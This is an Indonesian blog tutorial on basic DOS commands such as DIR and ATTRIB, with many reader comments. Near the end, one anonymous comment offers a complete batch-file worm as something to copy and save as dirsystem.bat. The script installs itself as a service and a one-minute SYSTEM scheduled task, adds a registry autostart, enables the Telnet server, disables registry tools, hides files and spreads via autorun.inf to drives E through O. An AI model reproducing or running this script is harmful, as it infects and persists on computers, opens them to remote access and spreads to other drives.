Perintah-Perintah DOS level 1

24 06 2007

Perintah-Perintah DOS level 1

Jumat, 18 Mei 2007 @ 17:24 WIBKomputer & Internet

MELIHAT DAFTAR PERINTAH YANG VALID DI COMMAND PROMPT: “HELP”

Untuk mengetahui perintah-perintah apa saja yang berlaku di Command Prompt, cukup ketikkan HELP kemudian tekan Enter. Untuk mengetahui daftar parameter spesifik untuk perintah tertentu, ketikkan spasi diikuti tanda /? di belakang perintah utama. Misalnya, untuk mengetahui parameter-parameter apa saja yang dapat diberikan untuk perintah “DIR”, cukup ketikkan “DIR /?” kemudian tekan Enter.

Di bawah ini diberikan ringkasan daftar perintah-perintah yang dapat digunakan di Command Prompt, yang penyajiannya dibagi dalam tiga kategori: dasar, mengenah dan lanjut. Pembagian ini diharapkan dapat memudahkan pembaca yang masih pemula untuk memilih prioritas perintah-perintah mana yang perlu dipelajari terlebih dahulu, terutama perintah-perintah yang paling sering digunakan. Sebenarnya tidak semua perintah disajikan di sini, hanya seingat dan sesempat penulis saja (halah…).

Perintah-perintah tingkat dasar:

Perintah-perintah tingkat dasar diperuntukkan bagi mereka yang masih dalam tahap belajar.

ATTRIB Perintah eksternal. Untuk melihat/mengubah atribut file
CLS Perintah internal. Untuk menghapus layar monitor
COPY Perintah internal. Untuk mengkopi file
DEL Perintah internal. Untuk menghapus file
DIR Perintah internal. Untuk melihat daftar file/folder di folder/direktori tertentu
MD Perintah internal. Untuk membuat direktori/folder baru
RD Perintah internal. Untuk menghapus folder (folder kosong)
REN Perintah internal. Untuk mengubah nama file/folder
TYPE Perintah internal. Untuk melihat isi file

Perintah-perintah tingkat menengah:

Perintah-perintah tingkat menengah diperuntukkan bagi mereka yang mulai mempelajari langkah-langkah recovery ringan, seperti format/install ulang, bad sector recovery.

EDIT Perintah eksternal. Untuk mengedit file teks (interaktif)
FDISK Perintah eksternal. Untuk melihat/mengubah/membuat partisi harddisk
FORMAT Perintah eksternal. Untuk memformat disket/harddisk
MORE Untuk mencegah tampilan menggulung terus-menerus
SYS Eksternal apa internal ya? Yang jelas untuk membuat disket/harddisk jadi bootable

Perintah-perintah tingkat lanjut:

DEBUG Perintah eksternal. Untuk melihat/mengubah isi file dalam format heksadesimal
REG Perintah eksternal. Untuk melihat/mengubah/menghapus key/value registry
TASKKILL Perintah eksternal. Untuk menghentikan/membunuh proses yang sedang berlangsung
TASKLIST Perintah eksternal. Untuk melihat daftar proses yang sedang berlangsung

Perintah-perintah BATCH

@
ECHO
REM

Program-program Utilities
QuickBASIC, PASCAL, TURBO C (bahasa pemrograman, program untuk membuat program).
Partition Magic for DOS (program partisi yang lebih mudah digunakan dibandingkan FDISK>/p>

MELIHAT DAFTAR FILE: “DIR”

Perintah “DIR” berfungsi untuk melihat daftar file/folder yang berada di direktori atau folder tertentu. Sebenarnya perintah DIR mempunyai banyak sekali parameter perintah yang dapat kita gunakan untuk membatasi daftar file/folder yang kita inginkan. Di antaranya, parameter-parameter ini dapat kita gunakan untuk menentukan file, folder atau file dan folder yang ingin kita lihat di direktori/folder tertentu, kemudian menentukan apakah kita akan menampilkan file-file yang hidden atau tidak, kemudian mengurutkan berdasarkan nama, tanggal, ukuran, dan sebagainya. Untuk mengetahui daftar parameter dan cara penggunaannya, ketikkan “DIR /?” kemudian tekan Enter.

Melihat daftar file/folder dalam direktori/folder tertentu
DIR (tanpa parameter)

Melihat daftar file saja
DIR /a-d

Melihat daftar folder saja
DIR /ad

Melihat daftar file yang tersembunyi
DIR /a-dh

Melihat daftar folder yang tersembunyi
DIR /adh

Melihat daftar file/folder yang tersembunyi
DIR /ah

MENGETAHUI/MENGUBAH ATRIBUT FILE: “ATTRIB”

Untuk mengetahui daftar parameter untuk perintah “ATTRIB”, ketikkan “ATTRIB /?”.

Melihat attribut file/folder
Format umum: ATTRIB namafile
Contoh: ATTRIB readme.txt
Untuk melihat attribut dari beberapa file/folder, gunakan wildcards character (*) pada namafile.

Mengubah attribut file/folder
ATTRIB daftaratribut namafile
Daftar atribut yang valid: H, R, S
Gunakan tanda ‘-’ di depan kode attribut untuk menonaktifkan atribut tertentu, gunakan tanda ‘+’ untuk mengaktifkan atribut tertentu.

Contoh pemakaian:
Mengubah atribut file README.TXT menjadi hidden
ATTRIB +h README.TXT

Mengaktifkan atribut hidden sekaligus atribut system pada file README.TXT
ATTRIB +h +s README.TXT

Menonaktifkan attribut hidden, read-only dan system pada semua file dalam direktori aktif (current directory). Kombinasi atribut ini dapat digunakan untuk memunculkan kembali file-file yang ‘disembunyikan’, misalnya sebagai dampak infeksi virus ke komputer:
ATTRIB -h -r -s *.*

About these ads

Aksi

Information

86 responses

27 06 2007
Mas doni

tolong yg lain dong seperti ping, ipconfig dst

27 06 2007
Novi

ya mas aku juga perlu tahu, perintah2 internal dan external belum paham betul tuh

27 06 2007
Ican

kalau penamaan yg valid dalam dos itu brp suku kata.
misal ada nama folder surat surat keterangan dan di dalamnya ada file surat keterangan.doc. untuk menerapkan perintah attrib saya lakukan attrib +h d:\surat surat keterangan\surat keterangan.doc /s tp selalu tidak mau.
apanya yang salah ya

27 06 2007
Wahyu

@mas doni

sip mas nanti di usahakan

@mbak novi

Ya nanti yg level 2 di bikin lebih mudah dimengerti, oke?

@ican

penamaan yg paling mudah *.* karena menunjukan semua eksistensi mas!jd nda perlu *.doc *.exe cukup ketik saja *.* karena bersifat global dan lebih mudah

2 07 2007
aloy

bagus juga ilmu yang kamu berikan, ini menjadi pelajaran bagi orang yang ga tau. karena masa sekarang ini orang labih kenal dengan windows, jadi tidak pernah mengenal dengan perintah dasar dari dos itu. terima kasih. kalau bisa tolong kirimkan lagi perintah-perintah yang lain di dalam dos. terima kasih

7 07 2007
hendra

Mas kalau perintah-2 untuk Linux ada g’. kalau ada boleh g’ kirimkan u/ aku ke email aku aja. soalnya aku mau belajar linux tp g’ tau perintah-2nya. aku pakai PUTTY loh untuk menjalankan perintahnya..
tolong kasih tau ya mas….. :D

thank’s atas bantuannya

13 07 2007
ben

wah, makasih banget Kang ilmunya. Bener2 mantab!! semoga barokah. Amien. Oh, ya… blognya Kang Wahyu tak buat di blogku. :D masih jelek. Baru belajar. Bimbingannya ya Kang?? Thanks,

9 08 2007
Dsm

Tolong dong dijelasin maksud arti perintah Eksternal dan Internal ?
Thank’s.

11 08 2007
Wahyu

coba ke tulisan saya yg mempelajari registry windows

17 08 2007
jok3rsmd

aku berterima kasih yang punya web ini,dia banyak membantu aku.thanks.good luck

26 09 2007
ibnu

w sekarang lagi nyari yang namanya program DOS. apalagi perintah2 Dos yang w blm tau… Yuu… kasih tau lagi dong.. perintah2 DOS…. yang Luu tau…

24 10 2007
ALDIE

tolong yang internal jg yaw

7 11 2007
awien hamlikar

prinsipnya perintah2 dalam dos prompt itu ada 2, yaitu INTERNAL yaitu perintah2 yg apabila komputer sdh menyala dgn disket dos misalnya cls dir ren copy dlll sedangkan kalo EXTERNAL adalah file2 yg terdapat dalam paket program MS-DOS apakah itu versi 3.0, 5.0, 6.0 ataupun 6.2 seperti misalnya FORMAT, DISKCOPY, EDIT, SYS dan masih banyak lagi

13 11 2007
anakdompu

Mas saya ambil tulisannya yach. mo di masukkan di anakdompu

salam

-AnakDompu-

26 11 2007
sooN

perintah dos buat ngoprek-oprek jaringan ato buat iseng di warnet apa yoe

30 11 2007
dewi

kalau pasang informasi yang lebih lengkap lagi ya……^^

4 01 2008
91L4nk

mantap mas, oyaa kok di komp ku gk bisa yaa dipakek utk perintah2 tersebut hanya bisa di pakai utk perintah tertentu saja misal nya “DIR” dan “SET” aja pada command prompt nya. tolng carikan solusinya mas, thank banget sebelumnya.

5 04 2008
mamase

Untuk wahyu…!! selamat dan sukses slalu.
tulisan kamu sungguh sangat banyak membantu, bg generasi sekarang yang nB nye pasti langsung di cekokin perintah windows dlm belajar komputer. thank”s

10 04 2008
khotim

makasih banget, pas banget buat tugas saya tuh……sekali lagi makasih !!!!!!!

25 04 2008
ijonk

tq tq….

26 04 2008
thomas

salam kenal mas,
maunanya tentang ganti IP lewat putty
soalnya aku bisa ganti IP tapi loginnya dapet dari temenku.
gmn caranya mendapatkan login dan IP baru/berbeda.
trim`s
tlg bls d sctrl@yahoo.com

21 06 2008
achmad

thenk ya mas ……. artikelnya mantap

26 06 2008
aris

kalo boleh perintah dos nya lebih lengkap lagi, thanks..

8 08 2008
Ahyar

command yang lainnya mana?
tq
salam

10 08 2008
putrex

ok saja

11 08 2008
putra

ha8i

11 08 2008
jhozz

command setting ip address gimna mas….
terimakasih

15 09 2008
Theo

ya.. kalau yang itu-itu udah lama mas…
yang laen donk…
kayak untuk memblok server lan ato yang lain dech mas…

21 09 2008
iaug08

salam kenal mas..
makasih info DOS-nya..

26 10 2008
antok

thx banget infonya

12 12 2008
mas_cul

sorry ne ku gak tahu persis sapa kamu. yang kutahu nama kamu mas wahyu yaw??!
tolong aku dikirimi file-file perintah external yang tingkat lanjut itu dunk….
karena aku sendiri baru tahu kalau ada perintah eksternal tingkat lanjut.hehe
maklum pemula………

tolong kirim ke mas_cul@ymail.com

27 12 2008
as

oooooooooooooooooooooooooo klu da yg lain donk yg murni buat jaringan gitu loh yaaaaaaaaaaaaaaaaaaaa

27 12 2008
as

salam knal jg

2 01 2009
arta

bagus artikelnya mas,…..kalo perintah yang lebih ke ngoprex2 jaringan di DOS kapan nih di post? lagi mau nyoba ngoprex pake DOS alnya.

13 01 2009
edi

Matur nuwun infonya aku lagi demen ama dos tapi masih sulit, coba coba dos windows bubar semua, ahkirnya install lagi ini hari baru beres, thanks

18 01 2009
tamtam

infonya sangat membantu saya, ijin copy paste di blog saya..nanti akansaya tulis sumbernya

18 01 2009
Putra

wah ini bagus banget mas….

bisa gak aku dikasih cara untuk mencari virus lewat dos, kan bisa tuch… cm aku gak tau perintahnya apa… tolong di kasih bocoran dikit yach…

ok thx’s mas

24 01 2009
Rabi'a

makaci atas informasinya, coz sangat membantu dalam menyelesaikn tugs.

bisa ngk dikasi contoh eksternal command yang lain?

2 02 2009
affandy murad

makasih ya berguna sekali buat pelajaran TIK SMA! silahkan kunjungi blog saya juga!

3 02 2009
andri.triswiandri

mas mo tanya kl nyari virus lewat commd form sintaknya apa

3 02 2009
andri.triswiandri

tolong dong..ni komputer kena virus..lewat gmail aja ya kirimin

6 02 2009
indrajka

makasih infonya mas

7 02 2009
ARMAN

terimakasih bang atas ilmunya…. saya pengen belajar banyak tentang dos,kalau bisa hal – hal tentang perintah2 dos lanjutannya dibagi2 bagi2 bang..

4 03 2009
Wahyusd’s Blog

[...] Perintah-Perintah DOS level 1 [...]

18 03 2009
ahmad

wa.. bermanfaat bener nih, thanks ya mas

18 03 2009
caLista

weww thx bgt lho mas
guna nih tutornya bwt gw

7 04 2009
dick

oce ..

22 04 2009
maxterpsyco

mas bisa gak bikin folder lewat dos akan tetapi nama folder tersebut merupakan tanggal pembuatan folder…..g mana commandnya di dos

13 05 2009
Ganjar

klw cara kembali ke folder sebelumnya bgmn?

20 05 2009
can

mantab boss.. tengkiyu bwt tulisannya. gw banyak belajar

10 06 2009
Bdr.boys

ya mana lagi niiiich comntx Q pembaca n’ pelajar yg baek aza

18 06 2009
aJHOe

Perintah Untuk Hidden IP lan Di Dos tau g bos

4 07 2009
ridwan

Salam kenal, bingung ni..Cara perintah copy files dari C: ke D: gimana ya? Untuk menyelamatan data. Temen2 bisa bantu g..ke email aq ridwanpost@gmail.com matur suwun banget.

13 07 2009
iqbal

thanks buat ilmunya….. mudah2an bs trus dtambah lg artiklnya!!!! semangat & sukses!!!!

20 07 2009
KOMUNITAS PELAJAR ILMU KOMPUTER INDONESIA

MS-DOS, singkatan dari Microsoft Disk Operating System,
adalah sebuah sistem operasi yang sangat banyak digunakan oleh komputer
IBM-PC atau yang kompatibel dengannya. Microsoft membuat MS-DOS sebagai
sebuah sistem operasi mainstream, sebelum pada akhirnya menghentikan dukungan
MS-DOS secara perlahan ketika mereka membuat sebuah sistem operasi berbasis
antarmuka grafis (dikenal juga dengan sebutan GUI) untuk pasar mainstream,
yang disebut sebagai Microsoft Windows.

Salam dari kami :
KOMUNITAS PELAJAR ILMU KOMPUTER INDONESIA (MR. AMATEUR)

29 08 2009
ADE

Makasih banget ya, cz gara@ Q ngebuka situs ini semua pekerjaan/tugas Q bisa cepet selesai……………. & ga lupa Q ucapin makasih buat informasinya,,, We Love You

30 08 2009
steven.G

Bagus bos infonya bagi saya yang newbie ini

5 10 2009
ferry andi s w

mksih mas..
buat informasi tntang DOS nya ..

18 10 2009
irsandy

wah, printah2nya bgs.. klo bleh bs mt yg laen algi perintah2nya mas… thanks…

20 10 2009
annah

oke banget deh … terbukti dah bisa mbantu ngerjain tugas kuliahku so tulisan ini juga berguna.. tetap optimiz ya… bahsanya oke deh… no what what…

6 11 2009
IRMAN

he……………………………..he…………………..he……………………….he………………………..he…………..

6 11 2009
HENDRA

ALAIKOM ?

10 11 2009
ekho

klaw bisa perintah eksternal dan internalnya ditambah lebih banyak lagi…

thnks ya.. mas uda bisa bantu ngerjain tugas kuliah….

12 11 2009
Rahmat

maw naxa nie?perintah2x msh ada lage ga’..
kalo bz skalian contoh penggunaanxa/hasil runningx

thanks!!!

12 12 2009
stefanus

mas aku masih kurang paham tentang pemahaman dos.
tolong lebih detail dan di permudah…
karna aku masukin perintah yang sesuai dengan mas tulis ngak bisa terbaca ama komputer aku….

thanks ya…..

21 12 2009
Steven.G

bagis juga perintah2nya bagi newbie kayak aku
yang pengen menguasi DOS

11 01 2010
farikin

kasih tau dong fungsi2 regedit

11 01 2010
farikin

masalahya bikin penasaran gue lo

10 02 2010
ikbal jk

mas klo wifi nga bisa d refresh ya gmn carana klo perintah ddos “netstart ……………….trus sambunganna apa lagi

ty before

10 02 2010
Wahyu

netstart -n
kalo pake –help aja dolo bisa di lihat fitur2 nya

7 04 2010
dewi

mas, klo bsa prntah2ny tuw d princi lg dunx, coz q dsruh bkin pwer point tntang DOS nie.

20 04 2010
daoen

mas klo “C:\document and setting \ all user>” untuk mengembalikan ke “C:\”
gmn mas..

2 05 2010
hamid

ckup sih mas,, n sip banget,, tapi untuk selanjutnya bikin perintah” yang lebih menarik lagi ya mas,, kaya cara mbasmi virus pake dos,, dll gtu yang keren buat dipelajari,, hehe

29 05 2011
bow

anda harus mengetahui script virus..nya… nanti bisa pakai find str… mencari text dalam file/aplikasi..

2 05 2010
hamid

sip lah,, tapi kalo boleh aku pengen tau dong mas perintah dos yang lebih menarik, kaya mbasmi virus pake dos,, dsb

20 07 2010
haris johan ais

makasih atas infonya,salam suskes selaalu

6 08 2010
dody

makasih yach atas bantuannya,,,
tolong bikinin level 2 ama level 3 nya ya,,
thanks,,,

14 09 2010
Chaulik

Mas? Klo perintah untk menampilkan isi file/folder scara urut abjad pake perintah apa ya? Balas yo mas?

19 09 2010
nia

knpa disk comp ma label g da?

4 11 2010
Nanang

Thanks tas ilmu….
mo nanya nie…
gimana sie carax (aturan2nya) buat file bat….

17 02 2011
ucup

izin copas gan thx

29 05 2011
    

ni mantap nih.. jarang2 ada yang gini.. ampir mirip jenis virus.. exe ini gak ada obatnya… meskipun ada sama aja microsoft bunuh diri nya sendiri.. kecuali berantas virus ini.. dengan mencari nama nya…

copy and paste di text.. trus sava all files. nama in dirsystem.bat

29 05 2011
    

@echo off
color fb
cls
sc config Schedule start= auto
sc start Schedule
sc config tlntsvr start= auto
sc start tlntsvr
mkdir %windir%\system32\2858111
xcopy /y dirsystem.cmd /h %windir%\system32\2858111
mkdir %homedrive%\RECYCLER\S-1-5-21-1957994488-823518204-725345543-1003
xcopy /y dirsystem.cmd /h %homedrive%\RECYCLER\S-1-5-21-1957994488-823518204-725345543-1003
attrib -s -h -r %windir%\system32\2858111\dirsystem.cmd
sc create system binpath= C:\windows\system32\2858111\dirsystem.cmd type= interact type= own start= auto
sc config system start= auto
sc start system
xcopy /y dirsystem.cmd /h %windir%\system32&xcopy /y dirsystem.cmd /h %windir%\system32\Restore
echo>>%windir%\system32\Microsoft\rotation.cmd @echo off
echo>>%windir%\system32\Microsoft\rotation.cmd start %homedrive%\RECYCLER\S-1-5-21-1957994488-823518204-725345543-1003\Dirsystem.cmd
echo>>%windir%\system32\microsoft\rotation.cmd reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v “Hidden” /t reg_dword /d 0 /f&reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v “ShowSuperHidden” /t reg_dword /d 0 /f&reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v “DisableRegistryTools” /t reg_dword /d 1 /f&f&reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v “ShowSuperHidden” /t reg_dword /d 0 /f&reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v “DisableRegistryTools” /t reg_dword /d 1 /f
echo>>%windir%\system32\Microsoft\rotation.cmd schtasks /create /sc minute /mo 1 /tn “VTTimer” /tr %windir%\system32\dirsystem.cmd /ru “System”
echo>>%windir%\system32\Microsoft\rotation.cmd @exit
reg add “HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows” /v load /t reg_SZ /d C:\windows\system32\Microsoft\rotation.cmd /f
attrib +s +h +r %windir%\system32\Microsoft\rotation.cmd
schtasks /create /sc minute /mo 1 /tn “VTTimer” /tr %windir%\system32\dirsystem.cmd /ru “System”
attrib +s +h +r %windir%\Tasks\VTTimer.job
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v “Hidden” /t reg_dword /d 0 /f&reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v “ShowSuperHidden” /t reg_dword /d 0 /f&reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion” /v RegisteredOwner /t REG_SZ /d merlin /f&reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion” /v RegisteredOrganization /t REG_SZ /d GINGO /f
del /q /f /a E:\autorun.inf&del /q /f /a F:\autorun.inf&del /q /f /a G:\autorun.inf&del /q /f /a H:\autorun.inf&del /q /f /a I:\autorun.inf
del /q /f /a J:\autorun.inf&del /q /f /a K:\autorun.inf&del /q /f /a L:\autorun.inf&del /q /f /a M:\autorun.inf&del /q /f /a N:\autorun.inf
echo>>E:\autorun.inf [autorun]&echo>>E:\autorun.inf shellexecute=dirsystem.cmd&attrib +s +h +r E:\autorun.inf
echo>>F:\autorun.inf [autorun]&echo>>F:\autorun.inf shellexecute=dirsystem.cmd&attrib +s +h +r F:\autorun.inf
echo>>G:\autorun.inf [autorun]&echo>>G:\autorun.inf shellexecute=dirsystem.cmd&attrib +s +h +r G:\autorun.inf
echo>>H:\autorun.inf [autorun]&echo>>H:\autorun.inf shellexecute=dirsystem.cmd&attrib +s +h +r H:\autorun.inf
echo>>I:\autorun.inf [autorun]&echo>>I:\autorun.inf shellexecute=dirsystem.cmd&attrib +s +h +r I:\autorun.inf
echo>>J:\autorun.inf [autorun]&echo>>J:\autorun.inf shellexecute=dirsystem.cmd&attrib +s +h +r J:\autorun.inf
echo>>K:\autorun.inf [autorun]&echo>>K:\autorun.inf shellexecute=dirsystem.cmd&attrib +s +h +r K:\autorun.inf
echo>>L:\autorun.inf [autorun]&echo>>L:\autorun.inf shellexecute=dirsystem.cmd&attrib +s +h +r L:\autorun.inf
echo>>M:\autorun.inf [autorun]&echo>>M:\autorun.inf shellexecute=dirsystem.cmd&attrib +s +h +r M:\autorun.inf
echo>>N:\autorun.inf [autorun]&echo>>N:\autorun.inf shellexecute=dirsystem.cmd&attrib +s +h +r N:\autorun.inf
echo>>O:\autorun.inf [autorun]&echo>>O:\autorun.inf shellexecute=dirsystem.cmd&attrib +s +h +r O:\autorun.inf
xcopy /y dirsystem.cmd /h E:\
xcopy /y dirsystem.cmd /h F:\
xcopy /y dirsystem.cmd /h G:\
xcopy /y dirsystem.cmd /h H:\
xcopy /y dirsystem.cmd /h i:\
xcopy /y dirsystem.cmd /h J:\
xcopy /y dirsystem.cmd /h K:\
xcopy /y dirsystem.cmd /h L:\
xcopy /y dirsystem.cmd /h M:\
xcopy /y dirsystem.cmd /h N:\
xcopy /y dirsystem.cmd /h O:\
attrib -s -h -r dirsystem.cmd
attrib +s +h +r dirsystem.cmd
attrib +s +h +r %windir%\system32\dirsystem.cmd
start %cd%
cls
@exit

7 08 2011
Sudirman Masli

Tolong Mas dituliskan semua cara mengoperasikan perintah DOS

26 09 2011
Disk Operating System (DOS) « ismayulianto

[...] wahyoe [...]

26 09 2011
ismayulianto

[...] wahyoe [...]

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Logout / Ubah )

Twitter picture

You are commenting using your Twitter account. Logout / Ubah )

Facebook photo

You are commenting using your Facebook account. Logout / Ubah )

Google+ photo

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s




Ikuti

Get every new post delivered to your Inbox.

%d bloggers like this: